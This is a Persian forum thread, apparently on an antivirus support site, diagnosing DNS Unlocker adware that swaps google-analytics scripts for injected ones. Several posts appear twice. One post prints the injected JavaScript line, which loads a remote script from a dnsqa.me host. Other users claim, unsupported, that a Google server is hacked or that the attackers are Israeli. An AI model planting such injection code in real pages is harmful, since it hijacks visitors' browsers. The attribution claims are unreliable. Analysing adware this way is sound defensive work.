[quote="علیرضا حسنی"]اینم میزارم برای دوستانی که علاقه مند به تحقیق بیشتر هستن ببینن چه اتفاقی میافته. مربوط به سایت karya.ir هست به عنوان نمونه.
به آی پی های 199.203.131.130 و 104.20.30.52 دقت کنید.
http://uplod.ir/a4pse2l6k2rc/CapturedData.cap.htm
من که دیگه کم کم دارم بیخیال میشم. چون فکر نمیکنم مشکل از سمت من باشه. اینم خیلی زرنگه، یه چند روز نا پدید میشه دوباره شروع میکنه به حمله، یه دو سه روزی هست خبری ازش نیست.[/QUOTE]
سلام
من به فایل ارسالی شما نگاهی انداختم.
(البته به نظر میرسه درخواستهای غیر HTTP را حذف کرده بودید و امکان دیدن DNS ها وجود نداشت؛ ولی با توجه به خروجی nslookup که قبلا فرستادید نیازی هم نبود)
با اطمینان میتونم بگم مشکل - حداقل در لاگی که فرستادید - مربوط به cache مرورگر شما است.
توضیح فنی:
اگر به درخواستی که برای آدرس http://www.google-analytics.com/ga.js ارسال شده نگاه کنید، مرورگر شما برای سرور یک هدر If-None-Match ارسال کرده است؛ در صورتیکه سرور اصلی گوگل از ETag استفاده نمیکند و در نتیجه هرگز چنین هدری از طرف مرورگر شما برای آن ارسال نمیشود. در عوض سرور m51.dnsqa.me از مکانیزم ETAG استفاده میکند. (توضیح مکانیزم ETAG)
این یعنی مرورگر شما قبلا اسکریپت http://www.google-analytics.com/ga.js را از سرور m51.dnsqa.me دریافت کرده و آن را کش کرده است.
کافیست یکبار کش مرورگر خود را خالی کنید تا این مساله برطرف شود. (البته با فرض اینکه بدافزار یا تنظیمات آن دیگر روی سیستم شما وجود نداشته باشد)
اگر بعد از این، باز هم مساله ادامه داشت باید دنبال بدافزار در سیستم (یا حتی مودم؟) بگردیم.
قبل از خالی کردن کش:
لطفا با مروگر خود به http://www.google-analytics.com/ga.js بروید و آن را ذخیره و برای ما ارسال کنید. میخواهم ببینم اسکریپت کش شده چیست.
تهدید dns unlocker
-
علیرضا حسنی
- پست: 25
- تاریخ عضویت: سهشنبه سپتامبر 22, 2015 2:11 pm
سلام درست میفرمایید طبیعتا وقتی اسکریپت اینجکت میشه تا وقتی اکسپایر نشه و یا کش مرورگر رو پاک نکنیم همچنان لود میشه، اما طی این مدت تقریبا چندین بار کش فایرفاکس و کروم رو پاک کردم، چند بار کلا فایرفاکس و گوگل رو رفرش کردم و حتی یکبار کلا مرورگرها رو آنیستال و دوباره نصب کردم ولی باز هم بعد چند روز این مسئله تکرار شده. در این که بد افزاری DNS لوکال رو تغییر نداده باشه تقریبا مطمئنم چون اولین چیزی که چک میکنم همیشه همین مورده، در مورد مودم مطمئن نیستم ولی عمدتا DNS رو لوکال روی ویندوزم روی 8.8.8.8 و 4.2.2.4 ست میکنم اصولا اتک و یا مشکلی از این نوع سمت مودم باید بی تاثیر باشه.
فایل ها رو براتون آپلود کردم فکر میکنم بسته به ورژن گوگل آنالاتیکز در نسخه ها جدید کد به ga.js و در نسخه های قدیمی به analytics.js تزریق میشه.
http://uplod.ir/indvwrk27gou/injected.rar.htm
از طرفی نسخه تریال ملورباتز هم اکسپایر شده و طبیعتا دیگه آلارمی ندارم که متوجه بشم. با این حال اگه متوجه مورد جدیدی شدم تو همین پست براتون میزارم.
[quote]این یعنی مرورگر شما قبلا اسکریپت http://www.google-analytics.com/ga.js را از سرور m51.dnsqa.me دریافت کرده و آن را کش کرده است.[/QUOTE]
اسکریپت ga.js و analytics.js مربوط به گوگل آنالیتیکز از dnsqa.me بارگذاری نمیشه، تو لینک اولین پستی که براتون گزاشتم نوشته از http://82.163.143.94/ga.js لود شده در اون مورد (اون ga.js دومی صرفا تشابه اسمی هستش و محتویاتش فرق داره اون باعث لود شدن تبلیغات اسکریپت نینجا میشه) اما تو اون مورد، بدافزار dns های لوکال رو تغییر داده بوده اما در مورد خودم مطمئن هستم که dns هام تغییری داده نشده بود.
با توجه به اینکه حمله فراز و فرود داره من فکر میکنم حمله ای به dns های خود گوگل و یا حمله ای از نوع کش پویزنینگ به DNS های میانی میشه.
فایل ها رو براتون آپلود کردم فکر میکنم بسته به ورژن گوگل آنالاتیکز در نسخه ها جدید کد به ga.js و در نسخه های قدیمی به analytics.js تزریق میشه.
http://uplod.ir/indvwrk27gou/injected.rar.htm
از طرفی نسخه تریال ملورباتز هم اکسپایر شده و طبیعتا دیگه آلارمی ندارم که متوجه بشم. با این حال اگه متوجه مورد جدیدی شدم تو همین پست براتون میزارم.
[quote]این یعنی مرورگر شما قبلا اسکریپت http://www.google-analytics.com/ga.js را از سرور m51.dnsqa.me دریافت کرده و آن را کش کرده است.[/QUOTE]
اسکریپت ga.js و analytics.js مربوط به گوگل آنالیتیکز از dnsqa.me بارگذاری نمیشه، تو لینک اولین پستی که براتون گزاشتم نوشته از http://82.163.143.94/ga.js لود شده در اون مورد (اون ga.js دومی صرفا تشابه اسمی هستش و محتویاتش فرق داره اون باعث لود شدن تبلیغات اسکریپت نینجا میشه) اما تو اون مورد، بدافزار dns های لوکال رو تغییر داده بوده اما در مورد خودم مطمئن هستم که dns هام تغییری داده نشده بود.
با توجه به اینکه حمله فراز و فرود داره من فکر میکنم حمله ای به dns های خود گوگل و یا حمله ای از نوع کش پویزنینگ به DNS های میانی میشه.
سلام
اگر حمله به سرورهای DNS گوگل یا میانی بود باید همه کاربران (مثلا من) هم با این مشکل مواجه میشدیم.
پیشنهاد من اینه که یک فایل bat روی سیستمتون بگذارید با محتوای زیر:
و این اسکریپت را تنظیم کنید که مثلا ساعتی یکبار (یا هر ۱۰ دقیقه یکبار) اجرا بشه. اینطوری بعد از چند روز میتونیم متوجه بشیم که حمله کی رخ میده و آیا تنظیمات کامپیوتر عوض میشود یا مربوط به مودم است.
نکته دیگر اینکه فرمودید که تنظیمات DNS کامپیوتر را عمدتا روی 8.8.8.8 تنظیم میکنید، ولی در لاگ nslookup که فرستادید تنظیمات DNS کامپیوتر روی مودم تنظیم شده بود؟!
اگر حمله به سرورهای DNS گوگل یا میانی بود باید همه کاربران (مثلا من) هم با این مشکل مواجه میشدیم.
پیشنهاد من اینه که یک فایل bat روی سیستمتون بگذارید با محتوای زیر:
کد: انتخاب همه
echo %date% %time% >>log.txt
nslookup www.google-analytics.com 8.8.8.8 >>log.txt
nslookup www.google-analytics.com >>log.txt
echo %date% %time% >>ipconfig.txt
ipconfig /all >>ipconfig.txt
نکته دیگر اینکه فرمودید که تنظیمات DNS کامپیوتر را عمدتا روی 8.8.8.8 تنظیم میکنید، ولی در لاگ nslookup که فرستادید تنظیمات DNS کامپیوتر روی مودم تنظیم شده بود؟!
-
علیرضا حسنی
- پست: 25
- تاریخ عضویت: سهشنبه سپتامبر 22, 2015 2:11 pm
[quote="naficy"]سلام
اگر حمله به سرورهای dns گوگل یا میانی بود باید همه کاربران (مثلا من) هم با این مشکل مواجه میشدیم.
[/quote]
نمیشه اینطور برداشت کرد، بسته به نوع حمله، زمان حمله، isp که هر کدوم از ما استفاده میکنیم، ارتباط dns ها و مسیر یابی بینشون و خیلی عوامل دیگه ممکنه تاثیرات حمله بر روی کاربران اینترنتی متفاوت باشه.
[quote]نکته دیگر اینکه فرمودید که تنظیمات dns کامپیوتر را عمدتا روی 8.8.8.8 تنظیم میکنید، ولی در لاگ nslookup که فرستادید تنظیمات dns کامپیوتر روی مودم تنظیم شده بود؟! [/quote]
بله اون موقع روی اتوماتیک تنظیم شده بود. داشتم تست میکردم.
اون اسکریپت لاگ هم که گفتید، اگه دوباره متوجه مورد مشکوکی شدم حتما اجرا میکنم و نتایجش رو براتون میزارم. الان فکر میکنم اگه بزارم صرفا لاگ تولید میکنه و زیاد بکار نمیاد
اگر حمله به سرورهای dns گوگل یا میانی بود باید همه کاربران (مثلا من) هم با این مشکل مواجه میشدیم.
[/quote]
نمیشه اینطور برداشت کرد، بسته به نوع حمله، زمان حمله، isp که هر کدوم از ما استفاده میکنیم، ارتباط dns ها و مسیر یابی بینشون و خیلی عوامل دیگه ممکنه تاثیرات حمله بر روی کاربران اینترنتی متفاوت باشه.
[quote]نکته دیگر اینکه فرمودید که تنظیمات dns کامپیوتر را عمدتا روی 8.8.8.8 تنظیم میکنید، ولی در لاگ nslookup که فرستادید تنظیمات dns کامپیوتر روی مودم تنظیم شده بود؟! [/quote]
بله اون موقع روی اتوماتیک تنظیم شده بود. داشتم تست میکردم.
اون اسکریپت لاگ هم که گفتید، اگه دوباره متوجه مورد مشکوکی شدم حتما اجرا میکنم و نتایجش رو براتون میزارم. الان فکر میکنم اگه بزارم صرفا لاگ تولید میکنه و زیاد بکار نمیاد
سلام
لطفا سری به Task Scheduler کامپیوتر خود بزنید.
DNS Unlocker چندین تسک درست میکند که تنظیمات DNS را در زمانهای مشخص یا مثلا با اتفاقاتی مثل لاگین و ... تغییر دهند.
اگر چنین تسکهایی پیدا کردید، مسیر فایل اجرایی را ببینید و محتویات پوشه مربوط به آن را برای ما به support@amnpardaz.com ارسال کنید.
لطفا سری به Task Scheduler کامپیوتر خود بزنید.
DNS Unlocker چندین تسک درست میکند که تنظیمات DNS را در زمانهای مشخص یا مثلا با اتفاقاتی مثل لاگین و ... تغییر دهند.
اگر چنین تسکهایی پیدا کردید، مسیر فایل اجرایی را ببینید و محتویات پوشه مربوط به آن را برای ما به support@amnpardaz.com ارسال کنید.
من هم مدتیه که این مشکل را پیدا کرده ام
آی پی google-analytics.com در برخی مواقع یک آی پی جعلی برمیگرده که فایل js را دستکاری میکنه.
بعد از دستکاری دیگه تو هر سایتی به صورت رندوم تبلیغات نشون میده و حتی پیامهای جعلی مبنی بر تشویق دانلود بد افزار روی عکسها.
چیزی که من فکر میکنم اینه که یه نفر به سطح دسترسی بالا یا یک هکر در شبکه ی زیرساخت ایران نفوذ کرده و این اقدامات را انجام میده. این کار سود ملیون دلاری برای اون شخص داره. شما فکر کن رو کل ترافیک یک کشور تبلیغات پخش کنی.
به پشتیبانی آسیاتک هم گفتم ولی هنوز جوابی ندادن و فکر نمیکنم پیگیری کنند.
وقتی که از دی ان اس سرور های 4.2.2.4 و یا مثلا سرورهای opendns درخواست آی پی سایت www.google-analytics.com درخواست میشه در برخی مواقع یک آی پی جعلی را بر میگردونه.
خوشحال میشم یافته هایمان را با هم شریک بشیم.
حتی جا داره این موضوع به وزارت ارتباطات هم کشیده بشه. این بحث امنیت ملی هست. میتونن با این رخنه مشکلات زیادی بوجود بیارن.
یک نفری در یکی از فرومهای خارجی در موضوع مشابهی بررسی کرده بود که سرورها و دامینهای جعلی از اسرائیل هست.
این خطی هست که به analytics.js اضافه میکنند :
آی پی google-analytics.com در برخی مواقع یک آی پی جعلی برمیگرده که فایل js را دستکاری میکنه.
بعد از دستکاری دیگه تو هر سایتی به صورت رندوم تبلیغات نشون میده و حتی پیامهای جعلی مبنی بر تشویق دانلود بد افزار روی عکسها.
چیزی که من فکر میکنم اینه که یه نفر به سطح دسترسی بالا یا یک هکر در شبکه ی زیرساخت ایران نفوذ کرده و این اقدامات را انجام میده. این کار سود ملیون دلاری برای اون شخص داره. شما فکر کن رو کل ترافیک یک کشور تبلیغات پخش کنی.
به پشتیبانی آسیاتک هم گفتم ولی هنوز جوابی ندادن و فکر نمیکنم پیگیری کنند.
وقتی که از دی ان اس سرور های 4.2.2.4 و یا مثلا سرورهای opendns درخواست آی پی سایت www.google-analytics.com درخواست میشه در برخی مواقع یک آی پی جعلی را بر میگردونه.
خوشحال میشم یافته هایمان را با هم شریک بشیم.
حتی جا داره این موضوع به وزارت ارتباطات هم کشیده بشه. این بحث امنیت ملی هست. میتونن با این رخنه مشکلات زیادی بوجود بیارن.
یک نفری در یکی از فرومهای خارجی در موضوع مشابهی بررسی کرده بود که سرورها و دامینهای جعلی از اسرائیل هست.
این خطی هست که به analytics.js اضافه میکنند :
کد: انتخاب همه
/* DNS Quality Check */ if (typeof dns_qc === 'undefined') { var dns_qc = document.createElement('script'); dns_qc.type='text/javascript'; dns_qc.src='http://m53.dnsqa.me/QualityCheck/ga.js'; var dns_qc_head = document.getElementsByTagName('head')[0]; if (dns_qc_head) { dns_qc_head.appendChild(dns_qc); } }
فریب شبه بدافزار مزاحم را نخورید
[IMG]http://itna.ir/images/docs/000038/n00038392-b.jpg[/IMG]
یکی از انواع برنامههای تبلیغاتی مزاحم و فریبنده DNS-Unlocker است که به سیستم فرد قربانی راه یافته و بدون اینکه وی اطلاعی از حضور این نرمافزار داشته باشد، خود را به مرورگر این فرد متصل میکند.
به گزارش ایتنا از مرکز ماهر، این نرمافزار معمولاً هنگامی که کاربر در حال کار کردن و سیر در صفحات وب است، به صورت اتوماتیک شروع به دانلود و نصب در پسزمینه میکند.
بهمحض اینکه این نرمافزار تبلیغاتی راهی به سیستم قربانی پیدا میکند، سریعاً خود را به add-on و extensionهای مرورگرهای گوگل کروم، اکسپلورر، موزیلا فایرفاکس و سافاری اپل متصل کرده و هنگامی که کاربر یک صفحه وب را ملاقات میکند، پیامهای تبلیغاتی که معمولاً پیام “Ads by DNSUnlocker” و یا “brought by DNSUnlocker" در متن آنها درج شده است را نشان میدهد.
DNS-Unlocker چیست؟
این نرمافزار مجانی، سرویسدهنده DNS است که طبق ادعای سازندگان آن، اجازه دور زدن محدودیتهای ناشی از فیلترینگ DNS را فراهم میسازد.
اما در نهان، این برنامه ابزاری تبلیغاتی بوده و پیامهای تبلیغاتی فریبنده و مزاحم بر روی صفحات وب ایجاد میکند.
این دسته از ابزارها تحت عنوان تبلیغات هدفگذاری شده نامگذاری میشوند، چراکه این نرمافزارها از اطلاعات شخصی کاربر (منظور تمامی اطلاعات درج شده در مرورگرها به دلیل مشاهده سایتهای مختلف است) برای ایجاد پیامهای تبلیغاتی استفاده میکنند که بیشترین احتمال بازدید از نظر کاربر مربوطه را دارند.
این نرمافزارها کاربر را بنا بر آمار بازدید سایتهایی که در گذشته و حال مرور کرده است، هدف قرار میدهند.
ایندسته از نرمافزارها را نمیتوان جزو بدافزارهای کامپیوتری تقسیمبندی کرد، ولی با این وجود این ابزار تبلیغاتیِ مزاحم همچنان یک تهدید برای محرمانگی هرکاربر محسوب میگردند.
معمولاً این دسته از نرمافزارها بدون آگاهی کاربر به سیستم وی راه مییابند و معمولاً در داخل سایر نرمافزارهای شخص ثالث قرار گرفته و بدون آگاهی کاربر بر روی سیستم فرد نصب میشوند.
جامعه امنیتی اینترنت به شدت توصیه کردهاند تا کاربران به محض مشاهده DNS-Unlocker بر روی سیستم خود، این نرمافزار را سریعاً پاک کنند و از آنتیویروسهای معتبر و نرمافزارهای ضدتروجان برای از بین بردن هرگونه فایل مخربی در سیستم کامپیوتری خود استفاده کنند.
http://itna.ir/vdcewx8x.jh8voi9bbj.html
[IMG]http://itna.ir/images/docs/000038/n00038392-b.jpg[/IMG]
یکی از انواع برنامههای تبلیغاتی مزاحم و فریبنده DNS-Unlocker است که به سیستم فرد قربانی راه یافته و بدون اینکه وی اطلاعی از حضور این نرمافزار داشته باشد، خود را به مرورگر این فرد متصل میکند.
به گزارش ایتنا از مرکز ماهر، این نرمافزار معمولاً هنگامی که کاربر در حال کار کردن و سیر در صفحات وب است، به صورت اتوماتیک شروع به دانلود و نصب در پسزمینه میکند.
بهمحض اینکه این نرمافزار تبلیغاتی راهی به سیستم قربانی پیدا میکند، سریعاً خود را به add-on و extensionهای مرورگرهای گوگل کروم، اکسپلورر، موزیلا فایرفاکس و سافاری اپل متصل کرده و هنگامی که کاربر یک صفحه وب را ملاقات میکند، پیامهای تبلیغاتی که معمولاً پیام “Ads by DNSUnlocker” و یا “brought by DNSUnlocker" در متن آنها درج شده است را نشان میدهد.
DNS-Unlocker چیست؟
این نرمافزار مجانی، سرویسدهنده DNS است که طبق ادعای سازندگان آن، اجازه دور زدن محدودیتهای ناشی از فیلترینگ DNS را فراهم میسازد.
اما در نهان، این برنامه ابزاری تبلیغاتی بوده و پیامهای تبلیغاتی فریبنده و مزاحم بر روی صفحات وب ایجاد میکند.
این دسته از ابزارها تحت عنوان تبلیغات هدفگذاری شده نامگذاری میشوند، چراکه این نرمافزارها از اطلاعات شخصی کاربر (منظور تمامی اطلاعات درج شده در مرورگرها به دلیل مشاهده سایتهای مختلف است) برای ایجاد پیامهای تبلیغاتی استفاده میکنند که بیشترین احتمال بازدید از نظر کاربر مربوطه را دارند.
این نرمافزارها کاربر را بنا بر آمار بازدید سایتهایی که در گذشته و حال مرور کرده است، هدف قرار میدهند.
ایندسته از نرمافزارها را نمیتوان جزو بدافزارهای کامپیوتری تقسیمبندی کرد، ولی با این وجود این ابزار تبلیغاتیِ مزاحم همچنان یک تهدید برای محرمانگی هرکاربر محسوب میگردند.
معمولاً این دسته از نرمافزارها بدون آگاهی کاربر به سیستم وی راه مییابند و معمولاً در داخل سایر نرمافزارهای شخص ثالث قرار گرفته و بدون آگاهی کاربر بر روی سیستم فرد نصب میشوند.
جامعه امنیتی اینترنت به شدت توصیه کردهاند تا کاربران به محض مشاهده DNS-Unlocker بر روی سیستم خود، این نرمافزار را سریعاً پاک کنند و از آنتیویروسهای معتبر و نرمافزارهای ضدتروجان برای از بین بردن هرگونه فایل مخربی در سیستم کامپیوتری خود استفاده کنند.
http://itna.ir/vdcewx8x.jh8voi9bbj.html
-
mohammadktabriz
- پست: 740
- تاریخ عضویت: جمعه سپتامبر 06, 2013 2:04 pm
-
علیرضا حسنی
- پست: 25
- تاریخ عضویت: سهشنبه سپتامبر 22, 2015 2:11 pm
پیداش کردم، همونطور که حدس میزدم یا یکی از سرور های گوگل کامپرومایز شده یا داره اتک کش پویزنینگ جایی بر روی گیت وی اینترنت کشور انجام میشه.
تا الان یک سرور آلوده رو پیدا کردم 173.194.113.39
از تمامی دوستان خواهش میکنم در صورت امکان شما هم تست کنید که متوجه بشیم سرور کامپرومایز شده یا اتک از نوع پویزنینگ هست، برای اینکار از طریق نرم افزار burpsuit اطلاعات زیر رو به آدرس آی پی 173.194.113.39 ارسال کنید. هر چی تست ها بیشتر و ISP های متفاوت انجام بگیره، دقیق تر میشه منشا حمله رو متوجه شد.
در پاسخ بررسی کنید عبارت dnsqa در ریسپانس وجود داره یا خیر مانند تصویر زیر.
http://s6.uplod.ir/i/00683/3rrxgptc0svn.png
فعلا به گوگل گزارش نمیدم تا ابعاد حمله بیشتر مشخص بشه. لطفا اگه با مرکز ماهر در ارتباط هستید بهشون گزارش بدید، ممنون میشم در صورت امکان اعتبار کشف این مشکل برای بنده و سایت garda.ir محفوظ بمونه.
--- ویرایش شده ---
صد در صد سرور گوگل هک شده.
کد: انتخاب همه
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\admin>nslookup www.google-analytics.com
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Non-authoritative answer:
Name: www-google-analytics.l.google.com
Addresses: 2a00:1450:4001:808::1004
173.194.113.38
173.194.113.35
173.194.113.36
173.194.113.39
173.194.113.37
173.194.113.32
173.194.113.46
173.194.113.33
173.194.113.40
173.194.113.41
173.194.113.34
Aliases: www.google-analytics.com
C:\Users\admin>nslookup www.google-analytics.com 192.168.1.1
Server: UnKnown
Address: 192.168.1.1
Non-authoritative answer:
Name: www-google-analytics.l.google.com
Addresses: 2a00:1450:4007:80e::200e
216.58.208.238
Aliases: www.google-analytics.com
از تمامی دوستان خواهش میکنم در صورت امکان شما هم تست کنید که متوجه بشیم سرور کامپرومایز شده یا اتک از نوع پویزنینگ هست، برای اینکار از طریق نرم افزار burpsuit اطلاعات زیر رو به آدرس آی پی 173.194.113.39 ارسال کنید. هر چی تست ها بیشتر و ISP های متفاوت انجام بگیره، دقیق تر میشه منشا حمله رو متوجه شد.
کد: انتخاب همه
GET /ga.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.garda.ir/
Connection: keep-alive
Cache-Control: max-age=0
در پاسخ بررسی کنید عبارت dnsqa در ریسپانس وجود داره یا خیر مانند تصویر زیر.
http://s6.uplod.ir/i/00683/3rrxgptc0svn.png
فعلا به گوگل گزارش نمیدم تا ابعاد حمله بیشتر مشخص بشه. لطفا اگه با مرکز ماهر در ارتباط هستید بهشون گزارش بدید، ممنون میشم در صورت امکان اعتبار کشف این مشکل برای بنده و سایت garda.ir محفوظ بمونه.
--- ویرایش شده ---
صد در صد سرور گوگل هک شده.